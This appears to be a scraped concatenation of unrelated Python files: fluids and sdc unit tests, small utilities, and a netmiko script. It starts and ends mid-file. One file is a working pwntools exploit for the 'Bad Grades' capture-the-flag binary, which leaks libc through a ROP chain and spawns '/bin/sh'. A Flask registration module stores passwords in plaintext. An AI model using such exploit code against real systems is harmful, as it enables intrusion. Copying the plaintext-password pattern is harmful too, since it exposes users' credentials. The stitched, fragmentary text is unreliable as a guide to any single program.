dict(roughness.dimensionality) == {u'[length]': 1.0} def test_custom_wraps(): A = A_multiple_hole_cylinder(0.01*u.m, 0.1*u.m, [(0.005*u.m, 1)]) assert_close(A.to_base_units().magnitude, 0.004830198704894308) assert dict(A.dimensionality) == {u'[length]': 2.0} V = V_multiple_hole_cylinder(0.01*u.m, 0.1*u.m, [(0.005*u.m, 1)]) assert_close(V.to_base_units().magnitude, 5.890486225480862e-06) assert dict(V.dimensionality) == {u'[length]': 3.0} # custom compressible flow model wrappers functions = [Panhandle_A, Panhandle_B, Weymouth, Spitzglass_high, Oliphant, Fritzsche] values = [42.56082051195928, 42.35366178004172, 32.07729055913029, 29.42670246281681, 28.851535408143057, 39.421535157535565] for f, v in zip(functions, values): ans = f(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, Tavg=277.15*u.K) assert_pint_allclose(ans, v, {u'[length]': 3.0, u'[time]': -1.0}) ans = IGT(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, mu=1E-5*u.Pa*u.s, Tavg=277.15*u.K) assert_pint_allclose(ans, 48.92351786788815, {u'[length]': 3.0, u'[time]': -1.0}) ans = Muller(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, mu=1E-5*u.Pa*u.s, Tavg=277.15*u.K) assert_pint_allclose(ans, 60.45796698148659, {u'[length]': 3.0, u'[time]': -1.0}) nu = nu_mu_converter(rho=1000*u.kg/u.m**3, mu=1E-4*u.Pa*u.s) assert_pint_allclose(nu, 1E-7, {u'[length]': 2.0, u'[time]': -1.0}) mu = nu_mu_converter(rho=1000*u.kg/u.m**3, nu=1E-7*u.m**2/u.s) assert_pint_allclose(mu, 1E-4, {u'[time]': -1.0, u'[length]': -1.0, u'[mass]': 1.0}) SA = SA_tank(D=1.*u.m, L=0*u.m, sideA='ellipsoidal', sideA_a=2*u.m, sideB='ellipsoidal', sideB_a=2*u.m)[0] assert_pint_allclose(SA, 10.124375616183064, {u'[length]': 2.0}) SA, sideA_SA, sideB_SA, lateral_SA = SA_tank(D=1.*u.m, L=0*u.m, sideA='ellipsoidal', sideA_a=2*u.m, sideB='ellipsoidal', sideB_a=2*u.m) expect = [10.124375616183064, 5.062187808091532, 5.062187808091532, 0] for value, expected in zip([SA, sideA_SA, sideB_SA, lateral_SA], expect): assert_pint_allclose(value, expected, {u'[length]': 2.0}) m = isothermal_gas(rho=11.3*u.kg/u.m**3, fd=0.00185*u.dimensionless, P1=1E6*u.Pa, P2=9E5*u.Pa, L=1000*u.m, D=0.5*u.m) assert_pint_allclose(m, 145.484757, {u'[mass]': 1.0, u'[time]': -1.0}) def test_db_functions(): # dB ans = control_valve_noise_g_2011(m=2.22*u.kg/u.s, P1=1E6*u.Pa, P2=7.2E5*u.Pa, T1=450*u.K, rho=5.3*u.kg/u.m**3, gamma=1.22, MW=19.8*u.g/u.mol, Kv=77.85*u.m**3/u.hour, d=0.1*u.m, Di=0.2031*u.m, FL=None, FLP=0.792, FP=0.98, Fd=0.296, t_pipe=0.008*u.m, rho_pipe=8000.0*u.kg/u.m**3, c_pipe=5000.0*u.m/u.s, rho_air=1.293*u.kg/u.m**3, c_air=343.0*u.m/u.s, An=-3.8, Stp=0.2) # assert_pint_allclose(ans, 91.67702674629604, {}) def test_check_signatures(): from fluids.units import check_args_order for name in dir(fluids): obj = getattr(fluids, name) if isinstance(obj, types.FunctionType): if hasattr(obj, 'func_name') and obj.func_name == '<lambda>': continue # 2 if hasattr(obj, '__name__') and obj.__name__ == '<lambda>': continue # 3 check_args_order(obj) def test_differential_pressure_meter_solver(): m = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, P1=200000.0*u.Pa, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(m, 7.702338035732167, {'[mass]': 1, '[time]': -1}) P1 = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, m=m, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(P1, 200000, {'[length]': -1, '[mass]': 1, '[time]': -2}) P2 = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, P1=200000.0*u.Pa, m=m, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(P2, 183000, {'[length]': -1, '[mass]': 1, '[time]': -2}) D2 = differential_pressure_meter_solver(D=0.07366*u.m, m=m, P1=200000.0*u.Pa, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(D2, .05, {'[length]': 1}) def test_Tank_units_full(): T1 = TANK(L=3*u.m, D=150*u.cm, horizontal=True, sideA=None, sideB=None) # test all methods V = T1.V_from_h(0.1*u.m, 'full') assert_pint_allclose(V, 0.151783071377, u.m**3) h = T1.h_from_V(0.151783071377*u.m**3, method='brenth') assert_pint_allclose(h, 0.1, u.m) h = T1.h_from_V(0.151783071377*u.m**3, 'brenth') assert_pint_allclose(h, 0.1, u.m) # Check the table and approximations T1.set_table(dx=1*u.cm) assert 151 == len(T1.volumes) assert_pint_allclose1d(T1.heights[0:3], [0, 0.01, 0.02], u.m) T1.set_table(n=10) assert 10 == len(T1.volumes) T1.set_table(n=10*u.dimensionless) assert 10 == len(T1.volumes) T1.set_chebyshev_approximators(8, 8) T1.set_chebyshev_approximators(8*u.dimensionless, 8) T1.set_chebyshev_approximators(8, 8*u.dimensionless) assert 16 == len(T1.c_forward) assert 16 == len(T1.c_backward) # Check the properties assert_pint_allclose(T1.h_max, 1.5, u.m) assert_pint_allclose(T1.V_total, 5.301437602932776, u.m**3) assert_pint_allclose(T1.L_over_D, 2, u.dimensionless) assert_pint_allclose(T1.A_sideA, 1.76714586764, u.m**2) assert_pint_allclose(T1.A_sideB, 1.76714586764, u.m**2) assert_pint_allclose(T1.A_lateral, 14.1371669412, u.m**2) assert_pint_allclose(T1.A, 17.6714586764, u.m**2) def test_HelicalCoil_units(): C2 = HelicalCoil(Do=30*u.cm, H=20*u.cm, pitch=5*u.cm, Dt=2*u.cm) C3 = HelicalCoil(2*u.cm, 30*u.cm, 5*u.cm, 20*u.cm) for C1 in [C2, C3]: assert_pint_allclose(C1.Dt, 0.02, u.m) assert_pint_allclose(C1.Do, 0.3, u.m) assert_pint_allclose(C1.Do_total, 0.32, u.m) assert_pint_allclose(C1.pitch, 0.05, u.m) assert_pint_allclose(C1.H, 0.2, u.m) assert_pint_allclose(C1.H_total, 0.22, u.m) assert_pint_allclose(C1.N, 4, u.dimensionless) assert_pint_allclose(C1.tube_circumference, 0.942477796077, u.m) assert_pint_allclose(C1.tube_length, 3.7752126215, u.m) assert_pint_allclose(C1.surface_area, 0.237203604749 , u.m**2) assert_pint_allclose(C1.curvature, 0.06, u.dimensionless) assert_pint_allclose(C1.helix_angle, 0.0530019606897, u.radians) def test_ATMOSPHERE_1976_units(): five_km = ATMOSPHERE_1976(5000*u.m) assert_pint_allclose(five_km.T, 255.675543222, u.K) assert_pint_allclose(five_km.P, 54048.2861458, u.Pa) assert_pint_allclose(five_km.rho, 0.73642842078, u.kg/u.m**3) assert_pint_allclose(five_km.g, 9.79124107698, u.m/u.s**2) assert_pint_allclose(five_km.mu, 1.62824813536e-05, u.Pa*u.s) assert_pint_allclose(five_km.k, 0.0227319029514, u.W/u.K/u.m) assert_pint_allclose(five_km.v_sonic, 320.54551967, u.m/u.s) assert_pint_allclose(five_km.sonic_velocity(300*u.K), 347.220809082, u.m/u.s) # Test the staticmethod works alone assert_pint_allclose(ATMOSPHERE_1976.sonic_velocity(300*u.K), 347.220809082, u.m/u.s) # Check AttribtueError is property raised on __getstate__ for classes # as they now have a __getattr_ method import copy copy.copy(five_km) copy.deepcopy(five_km) def test_ATMOSPHERE_NRLMSISE00(): a = ATMOSPHERE_NRLMSISE00(Z=1E3*u.m, latitude=45*u.degrees, longitude=45*u.degrees, day=150*u.day) assert_pint_allclose(a.T, 285.544086062, u.K) assert_pint_allclose(a.rho, 1.10190620264, u.kg/u.m**3) assert_pint_allclose(a.O2_density, 4.80470350725e+24, u.count/u.m**3) assert_pint_allclose(a.day, 12960000, u.day)
nilq/baby-python
python
vel = float(input('Velocidade do veículo: ')) velMax = 80 taxa= 7.00 if(vel > velMax): multa = (vel - velMax) * taxa print('Você ultrapassou o limite de velocidade! Pagar multa de R${:.2f}'.format(multa)) print('Dirija com Cuidado!')
nilq/baby-python
python
import csv from django.db import transaction from django_dynamic_fixture.django_helper import get_apps, get_models_of_an_app def color(color, string): return '\033[1;{}m{}\033[0m'.format(color, string) def white(string): return color('37', string) def red(string): return color('91', string) def green(string): return color('92', string) def ddf_check_models(application_labels=[], exclude_application_labels=[], csv_filename='ddf_compatibility_report.csv'): from django_dynamic_fixture import get succeeded = {} errors = {} for app_label in get_apps(application_labels, exclude_application_labels): models = get_models_of_an_app(app_label) for model_class in models: ref = '{}.{}'.format(app_label, model_class.__name__) try: with transaction.atomic(): get(model_class) succeeded[ref] = None except Exception as e: errors[ref] = '[{}] {}'.format(type(e), str(e)) console_report(succeeded, errors) if csv_filename: csv_report(succeeded, errors, filename=csv_filename) return succeeded, errors def console_report(succeeded, errors): print(green('\nModels that DDF can create using the default settings.\n')) for i, (ref, _) in enumerate(succeeded.items(), start=1): i = str(i).zfill(3) print(white('{}. {}: '.format(i, ref)) + green('succeeded')) print(red('\nModels that requires some customisation.\n')) for i, (ref, error) in enumerate(errors.items(), start=1): i = str(i).zfill(3) print(white('{}. {}: '.format(i, ref)) + red(error)) def csv_report(succeeded, errors, filename): with open(filename, 'w') as f: f.write(','.join(['#', 'Model', 'Succeeded', '\n'])) for i, (ref, _) in enumerate(succeeded.items(), start=1): f.write(','.join([str(i), ref, 'succeeded', '\n'])) f.write(','.join(['#', 'Model', 'Error', '\n'])) for i, (ref, error) in enumerate(errors.items(), start=1): f.write(','.join([str(i), ref, error, '\n']))
nilq/baby-python
python
#!/usr/bin/env python import pathlib import yaml from rich import print from netmiko import ConnectHandler def read_yaml(filename): with open(filename) as f: return yaml.safe_load(f) if __name__ == "__main__": # Load the .netmiko.yml file netmiko_yml = pathlib.PosixPath("~/.netmiko.yml") netmiko_yml = netmiko_yml.expanduser() my_devices = read_yaml(netmiko_yml) print() for device_name, device_dict in my_devices.items(): # Skip the groups if isinstance(device_dict, list): continue print(f"Connecting to -> {device_name}") with ConnectHandler(**device_dict) as nc: print(nc.find_prompt()) print() print() print()
nilq/baby-python
python
# HTB - Bad Grades from pwn import * import struct p = process("./grades") # gdb.attach(p, "b *0x0401106") def make_double(address): val = p64(address).hex() return str(struct.unpack("d", bytes.fromhex(val))[0]) elf = ELF("./grades") libc = ELF("./libc.so.6") rop = ROP(elf) rop2 = ROP(libc) p.recvuntil(b'> ') p.sendline(b'2') p.recvuntil(b'Number of grades:') popRdi = rop.find_gadget(["pop rdi"])[0] puts_got = elf.got["puts"] puts_plt = elf.plt["puts"] main = 0x401108 p.sendline(b'39') for i in range(35): p.recvuntil(b']:') p.sendline(b'.') p.recvuntil(b']:') p.sendline(make_double(popRdi)) p.recvuntil(b']:') p.sendline(make_double(puts_got)) p.recvuntil(b']:') p.sendline(make_double(puts_plt)) p.recvuntil(b']:') p.sendline(make_double(main)) p.recvuntil(b'\n') leak = u64(p.recvuntil(b'\n').strip().ljust(8, b'\x00')) print(hex(leak), hex(libc.symbols["puts"])) libc.address = leak - libc.symbols["puts"] log.info("libc rebased to: " + hex(libc.address)) p.recvuntil(b'> ') p.sendline(b'2') p.recvuntil(b'Number of grades:') p.sendline(b'39') for i in range(35): p.recvuntil(b']:') p.sendline(b'.') ret = rop2.find_gadget(["ret"])[0] popRdi = rop2.find_gadget(["pop rdi", "ret"])[0] system = libc.symbols["system"] sh = next(libc.search(b'/bin/sh\x00')) p.recvuntil(b']:') p.sendline(make_double(ret)) p.recvuntil(b']:') p.sendline(make_double(popRdi)) p.recvuntil(b']:') p.sendline(make_double(sh)) p.recvuntil(b']:') p.sendline(make_double(system)) p.interactive()
nilq/baby-python
python
from kiox.episode import Episode from kiox.step import StepBuffer from kiox.transition_buffer import UnlimitedTransitionBuffer from kiox.transition_factory import ( FrameStackTransitionFactory, SimpleTransitionFactory, ) from .utility import StepFactory def test_simple_transition_factory(): factory = StepFactory() episode = Episode(StepBuffer(), UnlimitedTransitionBuffer()) steps = [] for _ in range(10): steps.append(episode.append_step(factory())) transition_factory = SimpleTransitionFactory() for i in range(10): if i == 9: lazy_transition = transition_factory.create( step=steps[i], next_step=None, episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is None else: lazy_transition = transition_factory.create( step=steps[i], next_step=steps[i + 1], episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is steps[i + 1].idx assert lazy_transition.curr_idx is steps[i].idx assert lazy_transition.multi_step_reward == steps[i].reward assert lazy_transition.duration == 1 def test_frame_stack_transition_factory(): factory = StepFactory(observation_shape=(1, 84, 84)) episode = Episode(StepBuffer(), UnlimitedTransitionBuffer()) steps = [] for _ in range(10): steps.append(episode.append_step(factory())) transition_factory = FrameStackTransitionFactory(n_frames=3) for i in range(10): if i == 9: lazy_transition = transition_factory.create( step=steps[i], next_step=None, episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is None else: lazy_transition = transition_factory.create( step=steps[i], next_step=steps[i + 1], episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is steps[i + 1].idx prev_frames = [step.idx for step in steps[max(i - 2, 0) : i]] assert lazy_transition.curr_idx is steps[i].idx assert lazy_transition.multi_step_reward == steps[i].reward assert lazy_transition.duration == 1 assert lazy_transition.prev_frames == prev_frames
nilq/baby-python
python
from flask import Flask, render_template, request, session, url_for, redirect import pymysql.cursors from appdef import app, conn @app.route('/registerCustomer') def registerCustomer(): return render_template('registerCustomer.html') #Authenticates the register @app.route('/registerAuthCustomer', methods=['GET', 'POST']) def registerAuthCustomer(): #grabs information from the forms email = request.form['email'] name = request.form['name'] password = request.form['password'] building_number = request.form['building_number'] street = request.form['street'] city = request.form['city'] state = request.form['state'] phone_number = request.form['phone_number'] passport_number = request.form['passport_number'] passport_expiration = request.form['passport_expiration'] passport_country = request.form['passport_country'] date_of_birth = request.form['date_of_birth'] #cursor used to send queries cursor = conn.cursor() #executes query query = 'SELECT * FROM customer WHERE email = %s' cursor.execute(query, (email)) #stores the results in a variable data = cursor.fetchone() #use fetchall() if you are expecting more than 1 data row error = None if(data): #If the previous query returns data, then user exists error = "This user already exists" return render_template('registerCustomer.html', error = error) else: ins = 'INSERT INTO customer VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)' cursor.execute(ins, (email, name, password, building_number, street, city, state, phone_number, passport_number, passport_expiration, passport_country, date_of_birth)) conn.commit() cursor.close() return render_template('index.html') #Define route for register @app.route('/registerAgent') def registerAgent(): return render_template('registerAgent.html') @app.route('/registerAuthAgent', methods=['GET', 'POST']) def registerAuthAgent(): email = request.form['email'] password = request.form['password'] booking_agent_id = request.form['booking_agent_id'] cursor = conn.cursor() query = 'SELECT * FROM booking_agent WHERE email = %s' cursor.execute(query, (email)) data = cursor.fetchone() error = None if(data): error = "This user already exists" return render_template('registerAgent.html', error = error) else: ins = 'INSERT INTO booking_agent VALUES(%s, %s, %s)' cursor.execute(ins, (email, password, booking_agent_id)) conn.commit() cursor.close() conn.close() return render_template('index.html') @app.route('/registerStaff') def registerStaff(): return render_template('registerStaff.html') @app.route('/registerAuthStaff', methods=['GET', 'POST']) def registerAuthStaff(): username = request.form['username'] password = request.form['password'] first_name = request.form['first_name'] last_name = request.form['last_name'] date_of_birth = request.form['date_of_birth'] airline_name = request.form['airline_name'] cursor = conn.cursor() query = 'SELECT * FROM airline_staff WHERE username = %s' cursor.execute(query, (username)) data = cursor.fetchone() error = None if(data): error = "This user already exists" return render_template('registerStaff.html', error = error) else: ins = 'INSERT INTO airline_staff VALUES(%s, %s, %s, %s, %s, %s)' cursor.execute(ins, (username, password, first_name, last_name, date_of_birth, airline_name)) conn.commit() cursor.close() conn.close() return render_template('index.html')
nilq/baby-python
python
from spaceone.inventory.connector.aws_sqs_connector.connector import SQSConnector
nilq/baby-python
python
#!/usr/bin/env python # Copyright 2014-2015 Canonical Limited. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import sys import subprocess from charmhelpers.core import hookenv def default_execd_dir(): return os.path.join(os.environ['CHARM_DIR'], 'exec.d') def execd_module_paths(execd_dir=None): """Generate a list of full paths to modules within execd_dir.""" if not execd_dir: execd_dir = default_execd_dir() if not os.path.exists(execd_dir): return for subpath in os.listdir(execd_dir): module = os.path.join(execd_dir, subpath) if os.path.isdir(module): yield module def execd_submodule_paths(command, execd_dir=None): """Generate a list of full paths to the specified command within exec_dir. """ for module_path in execd_module_paths(execd_dir): path = os.path.join(module_path, command) if os.access(path, os.X_OK) and os.path.isfile(path): yield path def execd_run(command, execd_dir=None, die_on_error=True, stderr=subprocess.STDOUT): """Run command for each module within execd_dir which defines it.""" for submodule_path in execd_submodule_paths(command, execd_dir): try: subprocess.check_output(submodule_path, stderr=stderr, universal_newlines=True) except subprocess.CalledProcessError as e: hookenv.log("Error ({}) running {}. Output: {}".format( e.returncode, e.cmd, e.output)) if die_on_error: sys.exit(e.returncode) def execd_preinstall(execd_dir=None): """Run charm-pre-install for each module within execd_dir.""" execd_run('charm-pre-install', execd_dir=execd_dir)
nilq/baby-python
python
"""Test the `crc` main function.""" from crc.bin.crc3 import crc import os import pytest # noqa: F401 import sys TEST_FILES_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), 'files')) TEST_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'tests')) def test_crc(): """Test crc functionality.""" crc( '{}/test_enhancers.bed'.format(TEST_FILES_DIR), 'HG19', '{}/Chromosomes/'.format(TEST_FILES_DIR), TEST_DIR, 'test', subpeak_file='{}/mock_regions.bed'.format(TEST_FILES_DIR), ) scores = [] with open(os.path.join(TEST_DIR, 'test_CLIQUE_SCORES_DEGREE.txt')) as infile: for line in infile: scores.append(float(line.split('\t')[1].strip('\n'))) if (sys.version_info > (3, 0)): test_scores = [8.25, 8.0, 7.75, 7.333333333333333] else: test_scores = [8.25, 8.0, 7.75, 7.33333333333] assert scores == test_scores, 'Clique scores do not match!'
nilq/baby-python
python
import os from collections import namedtuple from typing import List, TypedDict from numpy.lib.arraysetops import isin FIT_URL = 'https://raw.githubusercontent.com/notemptylist/shinko/main/modelfits/arima/' FIT_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'modelfits', 'arima') FitSpec = namedtuple('FitSpec', ['stream', 'numlags', 'todo', 'results', 'tstamp']) fitspec_version = '0.1' class fitresult(TypedDict): order: tuple rmse: float mean: float tstamp: float class fitspec(TypedDict): stream: str numlags: int todo: List[tuple] results: List[fitresult] def make_spec(): s: fitspec = {'stream': '', 'numlags': 0, 'todo': [], 'results': [], 'version': fitspec_version } return s if __name__ == "__main__": import json fs: fitspec = {'stream': 'foo.json', 'numlags': 400, 'todo': [(0, 0, 1), (1, 6, 0)], 'results': [ {'order': (1, 1, 1), 'rmse': .90, 'mean': .20, 'tstamp': 12312312312 }, ], 'version': fitspec_version } print(fs) print(isinstance(fs, dict)) with open('foo.json', 'w') as fp: json.dump(fs, fp) with open('foo.json', 'r') as fp: foo = json.load(fp) print(foo) print(isinstance(foo, dict))
nilq/baby-python
python
import os v = os.environ.get('SOME_KEY') if v.<caret>
nilq/baby-python
python
# -*- coding: utf-8 -*- # ***************************************************************************** # Copyright (c) 2020, Intel Corporation All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ***************************************************************************** import numba import numpy as np import pandas as pd import unittest from itertools import (combinations_with_replacement, product, ) from sdc.tests.indexes.index_datagens import ( test_global_index_names, _generate_valid_int64_index_data, _generate_int64_indexes_fixed, get_sample_index, ) from sdc.tests.test_base import TestCase from sdc.datatypes.indexes import * class TestInt64Index(TestCase): def test_int64_index_type_inferred(self): for data in _generate_valid_int64_index_data(): for name in test_global_index_names: index = pd.Int64Index(data, name=name) with self.subTest(index=index): native_index_type = numba.typeof(index) self.assertIsInstance(native_index_type, Int64IndexType) def test_int64_index_create_and_box(self): def test_impl(data, name): return pd.Int64Index(data, name=name) sdc_func = self.jit(test_impl) name = 'index' for data in _generate_valid_int64_index_data(): with self.subTest(index_data=data): result = sdc_func(data, name) result_ref = test_impl(data, name) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_unbox_and_box(self): def test_impl(index): return index sdc_func = self.jit(test_impl) n = 11 for index in _generate_int64_indexes_fixed(n): with self.subTest(index=index): result = sdc_func(index) result_ref = test_impl(index) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_create_param_copy_true(self): def test_impl(arr): return pd.Int64Index(arr, copy=True) sdc_func = self.jit(test_impl) index_data_to_test = [ np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64), list(np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64)), pd.RangeIndex(11), pd.Int64Index([1, 2, 3, 5, 6, 3, 4]), ] for index_data in index_data_to_test: with self.subTest(index_data=index_data): result = sdc_func(index_data) result_ref = test_impl(index_data) pd.testing.assert_index_equal(result, result_ref) self.assertEqual(result._data is result_ref._data, False) def test_int64_index_create_param_copy_default(self): def test_impl(arr): return pd.Int64Index(arr) sdc_func = self.jit(test_impl) # only test data that has underlying array that can be referenced # and ensure it has int64 dtype as otherwise there will always be a copy index_data_to_test = [ np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64), pd.Int64Index([1, 2, 3, 5, 6, 3, 4]), ] for index_data in index_data_to_test: with self.subTest(index_data=index_data): result = sdc_func(index_data) result_ref = test_impl(index_data) pd.testing.assert_index_equal(result, result_ref) self.assertEqual(result._data is result_ref._data, True) def test_int64_index_create_param_dtype(self): def test_impl(n, dtype): return pd.Int64Index(np.arange(n), dtype=dtype) sdc_func = self.jit(test_impl) n = 11 supported_dtypes = [None, np.int64, 'int64', np.int32, 'int32'] for dtype in supported_dtypes: with self.subTest(dtype=dtype): result = sdc_func(n, dtype) result_ref = test_impl(n, dtype) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_create_param_dtype_invalid(self): def test_impl(n, dtype): return pd.Int64Index(np.arange(n), dtype=dtype) sdc_func = self.jit(test_impl) n = 11 invalid_dtypes = ['float', 'uint'] for dtype in invalid_dtypes: with self.subTest(dtype=dtype): with self.assertRaises(Exception) as context: test_impl(n, dtype) pandas_exception = context.exception with self.assertRaises(type(pandas_exception)) as context: sdc_func(n, dtype) sdc_exception = context.exception self.assertIn(str(sdc_exception), str(pandas_exception)) def test_int64_index_attribute_dtype(self): def test_impl(index): return index.dtype sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_attribute_name(self): def test_impl(index): return index.name sdc_func = self.jit(test_impl) n = 11 index_data = np.arange(n) * 2 for name in test_global_index_names: with self.subTest(name=name): index = pd.Int64Index(index_data, name=name) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_len(self): def test_impl(index): return len(index) sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2, name='index') result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_attribute_values(self): def test_impl(index): return index.values sdc_func = self.jit(test_impl) for data in _generate_valid_int64_index_data(): index = pd.Int64Index(data) with self.subTest(index_data=data): result = sdc_func(index) result_ref = test_impl(index) np.testing.assert_array_equal(result, result_ref) def test_int64_index_contains(self): def test_impl(index, value): return value in index sdc_func = self.jit(test_impl) index = pd.Int64Index([1, 11, 2]) values_to_test = [-5, 15, 1, 11, 5, 6] for value in values_to_test: with self.subTest(value=value): result = sdc_func(index, value) result_ref = test_impl(index, value) np.testing.assert_array_equal(result, result_ref) def test_int64_index_copy(self): def test_impl(index, new_name): return index.copy(name=new_name) sdc_func = self.jit(test_impl) for data in _generate_valid_int64_index_data(): for name, new_name in product(test_global_index_names, repeat=2): index = pd.Int64Index(data, name=name) with self.subTest(index=index, new_name=new_name): result = sdc_func(index, new_name) result_ref = test_impl(index, new_name) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_copy_param_deep(self): def test_impl(index, deep): return index.copy(deep=deep) sdc_func = self.jit(test_impl) index = pd.Int64Index([1, 11, 2]) for deep in [True, False]: with self.subTest(deep=deep): result = sdc_func(index, deep) result_ref = test_impl(index, deep) pd.testing.assert_index_equal(result, result_ref) self.assertEqual( result._data is index._data, result_ref._data is index._data ) def test_int64_index_getitem_scalar(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) for data in _generate_valid_int64_index_data(): index = pd.Int64Index(data) n = len(index) values_to_test = [-n, n // 2, n - 1] for idx in values_to_test: with self.subTest(index=index, idx=idx): result = sdc_func(index, idx) result_ref = test_impl(index, idx) self.assertEqual(result, result_ref) def test_int64_index_getitem_scalar_idx_bounds(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2, name='abc') values_to_test = [-(n + 1), n] for idx in values_to_test: with self.subTest(idx=idx): with self.assertRaises(Exception) as context: test_impl(index, idx) pandas_exception = context.exception with self.assertRaises(type(pandas_exception)) as context: sdc_func(index, idx) sdc_exception = context.exception self.assertIsInstance(sdc_exception, type(pandas_exception)) self.assertIn("out of bounds", str(sdc_exception)) def test_int64_index_getitem_slice(self): def test_impl(index, idx): return index[idx] sdc_func = self.jit(test_impl) n = 17 slices_params = combinations_with_replacement( [None, 0, -1, n // 2, n, n - 3, n + 3, -(n + 3)], 2 ) for data in _generate_valid_int64_index_data(): index = pd.Int64Index(data, name='abc') for slice_start, slice_stop in slices_params: for slice_step in [1, -1, 2]: idx = slice(slice_start, slice_stop, slice_step) with self.subTest(index=index, idx=idx): result = sdc_func(index, idx) result_ref = test_impl(index, idx) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_iterator_1(self): def test_impl(index): res = [] for i, label in enumerate(index): res.append((i, label)) return res sdc_func = self.jit(test_impl) index = pd.Int64Index([5, 3, 2, 1, 7, 4]) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_iterator_2(self): def test_impl(index): res = [] for label in index: if not label % 2: res.append(label) return res sdc_func = self.jit(test_impl) index = pd.Int64Index([5, 3, 2, 1, 7, 4]) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_nparray(self): def test_impl(index): return np.array(index) sdc_func = self.jit(test_impl) n = 11 index = get_sample_index(n, Int64IndexType) result = sdc_func(index) result_ref = test_impl(index) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_eq_index(self): def test_impl(index1, index2): return index1 == index2 sdc_func = self.jit(test_impl) n = 11 for index1, index2 in product(_generate_int64_indexes_fixed(n), repeat=2): with self.subTest(index1=index1, index2=index2): result = np.asarray(sdc_func(index1, index2)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(index1, index2) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_eq_scalar(self): def test_impl(A, B): return A == B sdc_func = self.jit(test_impl) n = 11 A = pd.Int64Index(np.arange(n) * 2) scalars_to_test = [0, 22, 13, -5, 4.0] for B in scalars_to_test: for swap_operands in (False, True): if swap_operands: A, B = B, A with self.subTest(left=A, right=B): result = np.asarray(sdc_func(A, B)) # FIXME_Numba#5157: remove np.asarray result_ref = test_impl(A, B) np.testing.assert_array_equal(result, result_ref) def test_int64_index_operator_eq_nparray(self): def test_impl(A, B): return A == B sdc_func = 